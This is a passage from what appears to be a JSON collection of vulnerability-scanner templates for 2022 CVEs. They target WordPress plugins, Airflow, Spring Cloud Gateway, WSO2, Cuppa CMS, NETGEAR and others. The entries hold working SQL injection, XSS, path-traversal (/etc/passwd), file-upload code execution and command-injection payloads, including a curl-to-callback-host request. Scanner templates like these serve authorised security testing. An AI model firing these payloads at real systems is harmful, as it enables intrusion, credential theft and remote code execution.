CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"regex","regex":["^1331' and sleep\\(7\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp","Total execution time is"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-34094","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2174","info":{"name":"microweber 1.2.18 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(body, \"<script>alert(document.domain)</script>\") && contains(body, \"microweber\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["p1_network_mail.cgi"]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; 